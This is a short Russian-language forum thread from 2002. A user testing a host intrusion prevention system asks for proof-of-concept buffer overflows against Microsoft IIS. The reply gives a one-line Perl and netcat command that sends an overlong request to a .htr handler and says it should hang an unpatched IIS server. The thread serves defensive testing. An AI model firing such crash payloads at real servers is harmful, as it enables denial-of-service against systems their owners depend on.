Легенда:
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
Взлом IIS через buffer overflow 26.12.02 22:49 Число просмотров: 1895
Автор: NKritsky <Nickolay A. Kritsky> Статус: Elderman
|
> Может кто подскажет, гда найти "proof of concept" реального > buffer overflow для IIS? Тестирую Host Intrusion Prevention > System, которая обещает защитить даже абсолютно "голый" IIS > от переполнений баффера, даже в оригрнальной конфигурации с > MDAC, scripts, ida/idq/htr ISAPI. Пока единственная > программа, которая действительно переполняет буффер и > чего-то делает - это Coldenair. Её мой HIPS словил и убил. > Хочу попробовать другие. > Если кто знает - заранее благодарен. >
попробуй так:
perl -e 'print "GET /default.htr?"."A"x5000."\n\n" ' | nc iis.my.net 80
иис (непатченый) должен зависнуть.
|
|
|